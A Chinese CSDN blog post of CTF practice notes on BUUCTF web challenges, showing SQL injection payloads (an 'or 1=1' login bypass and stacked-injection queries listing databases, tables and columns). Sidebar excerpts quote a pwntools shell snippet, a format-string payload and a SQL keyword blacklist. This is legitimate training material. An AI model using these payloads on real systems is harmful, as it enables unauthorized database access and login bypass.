buuctf刷题笔记

最新推荐文章于 2023-07-13 11:41:11 发布
最新推荐文章于 2023-07-13 11:41:11 发布
阅读量271 收藏
点赞数
文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gygert/article/details/114801760
版权
本文记录了作者在CTF比赛中进行Web题目练习的过程,特别是针对SQL注入的解题心得。通过尝试解决buu_[极客大挑战 2019]EasySQL和buu_随便注两道题,作者接触到了SQL注入的万能密码和堆叠注入概念。然而在后续解题中遇到困难,计划研究如何修改表名等高级技巧。
摘要由CSDN通过智能技术生成

CTF web刷题笔记

菜狗二进制学不下去了开始学web嗷

目录

SQL注入

buu_[极客大挑战 2019]EasySQL

听说SQL注入有万能密码

username=admin' or '1'='1&password=admin' or '1'='1

在这里插入图片描述
在这里插入图片描述

buu_随便注

在这里插入图片描述
输入2显示miaomiaomiao其他就没了
在这里插入图片描述
先用?inject=1’测试下
在这里插入图片描述

1';show databases;#

听说这叫堆叠注入?
在这里插入图片描述

1';show tables;#

在这里插入图片描述

1';show columns from `1919810931114514`;#

在这里插入图片描述
后面不会做了。。。听说要改表名啥的贴个大佬的WP
在这里插入图片描述

尼玛这第三题就这么难了?还tm五千多人做出来了?这是逼我滚回去做二进制?

Gygert
关注
labuladong的算法秘籍+刷题笔记V2.0
09-17
《labuladong的算法秘籍+刷题笔记V2.0》是针对计算机程序员面试和技能提升的一份宝贵资源,特别关注于刷题、算法和数据结构的学习。这套资料包含两部分:《labuladong的刷题笔记V2.0(力扣版).pdf》和《labuladong的...
谷歌高畅Leetcode刷题笔记.pdf
08-04
这本书名为《LeetCode101:和你一起你轻松刷题(C++)》的电子书,作者高畅ChangGao,旨在帮助有C++基础但缺乏刷题经验的读者。本文将详细阐述该电子书中提及的IT知识点,覆盖算法与数据结构两大板块,以及十五个...
BUU刷题
qidiandexiaowu
12-12 500
目录[极客大挑战 2019]PHP [极客大挑战 2019]PHP 题目说网站备份,直接www.zip,里面有个flag文件,提交了不对。 于是看其他的php文件,在index.php里,众多的HTML代码藏了这一串代码(非常不起眼) <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 对我们传入的的select进行反序列化,如何赋给res变量
BUU刷题1
weixin_52878095的博客
02-17 3050
test_your_nc 下载附件,放到linux下面,使用checksec查看文件信息 checksec test 发现是64位小端序,开了栈不可执行和PIE 把文件用IDA打开,发现main函数直接调用了system("/bin/sh") 所以直接用pwntools建立连接 from pwn import * r = remote("IP",PORT) r.interactive() 拿到shell,直接cat flag rip 下载附件,放到linux下面,使用checksec查看文件信息 che
BUU刷题-web
qq_46540840的博客
09-05 362
[NCTF2019]SQLi 访问robots.txt 发现hint $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['pas
力扣500题刷题笔记1
08-04
在力扣500题刷题笔记中,我们主要探讨了三个不同的问题,分别是:29. 两数相除、36. 有效的数独和38. 外观数列。这些问题涉及到的主要知识点包括整数除法的实现、有效的数独判断以及序列生成算法。 1. **两数相除**...
LeetCode刷题笔记.rar
07-05
《LeetCode刷题笔记》是针对LeetCode这个在线编程挑战平台的个人学习心得与总结,主要涵盖数据结构和算法两大核心领域。LeetCode是一个全球知名的编程训练网站,它提供了丰富的编程题目,帮助开发者提升编程技能,...
Python 刷题笔记:位运算专题一
12-20
在Python编程语言中,位运算符是用于对整数类型(如int)的二进制表示进行操作的特殊运算符。这些运算符直接作用于数字的二进制位,而不是它们的十进制或其它进制值。在深入位运算之前,我们需要先理解计算机中的二...
BUU刷题(三)
playmaker的博客
03-13 1007
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
BUU刷题-Pwn-rip
一个啥也不会的小菜鸡!
07-13 325
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)里面有详细解释,涉及到[[堆栈平衡]]
BUU刷题(二)
your_friends的博客
10-06 218
看到在登陆路由里面如果我们提交了register她会判断你的userid如果里面含有大小写的admin就会弹窗禁言,但是登陆的action判断又必须得是大写的ADMIN。他将我们的输入clone到data中,所以这里我们如果污染这里的内容就可以了,那么污染哪个内容呢,我们继续跟进下面剩下的info路由。这里把我们输入的userid转换成大写了,而nodejs的大小写是有特性的,如果相像的字符通过转换之后可能会相同。看不明白了,所以查了一查,发现这里考的是C语言的预编译。
buu刷题记录
Luiino的博客
01-02 420
分析:整体观察一下,发现是CBC模式下的AES。key是32字节(256bits),iv是16字节(128bits),所以两者异或的结果其实是key的低128bits与iv异或,再加上key的高128bits。即输出结果的高128bits就是key的高128bits,从而能得到key。得到了key之后,取低128bits再与输出结果的低128bits进行异或得到iv。
BUU刷题记录
as you know, nlp is fantasitc!
08-10 407
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web
weixin_45784586的博客
06-21 744
尝试之路加wp 观察源代码和get所传参数可猜测img所传参数img就是该图片 经过两次base64编码和一次hex编码后可得555.png成果验证猜测 然后发现该图片以data元数据封装的方式放到了源码里 猜测可以通过此漏过获得index.php的源码 于是将img处参数设为经过两次base64编码和一次hex编码后的index.php 成功获得index.php源代码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-typ
BUU_刷题之旅(One)
Lemon's blog
05-27 1038
前言: 水平不够,刷题来凑! [NPUCTF2020]ReadlezPHP ——反序列化、disable_functions的绕过、flag隐藏在phpinfo中 开始以为这一堆0101有什么线索,看了大半天也没找出来,抓包的时候发现 访问一下,发现是php代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $t
BUU刷题记录(WEB-1)
Martin-share的博客
11-21 484
[强网杯 2019]随便注 [GYCTF2020]Blacklist[极客大挑战 2019]PHP 序列化[网鼎杯 2020 青龙组]AreUSerialz[RoarCTF 2019]Easy Calc[护网杯 2018]easy_tornado SSTI[BJDCTF2020]The mystery of ip SSTI[极客大挑战 2022] Not_Stay [GXYCTF2019]BabySQli[CISCN2019 华北赛区 Day2 Web1]Hack World[RoarCTF 2019
Buu刷题Day1
姜小孩的博客
03-08 1488
buu刷题第一天
labuladong的刷题笔记
最新发布
09-12
"Labuladong"是一个著名的算法题解博主,他的刷题笔记非常受欢迎。他的笔记具有以下几个特点: 1. 思路清晰:Labuladong的刷题笔记总是能够很清晰地阐述解题思路。他善于将复杂的问题简化为易于理解的小问题,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值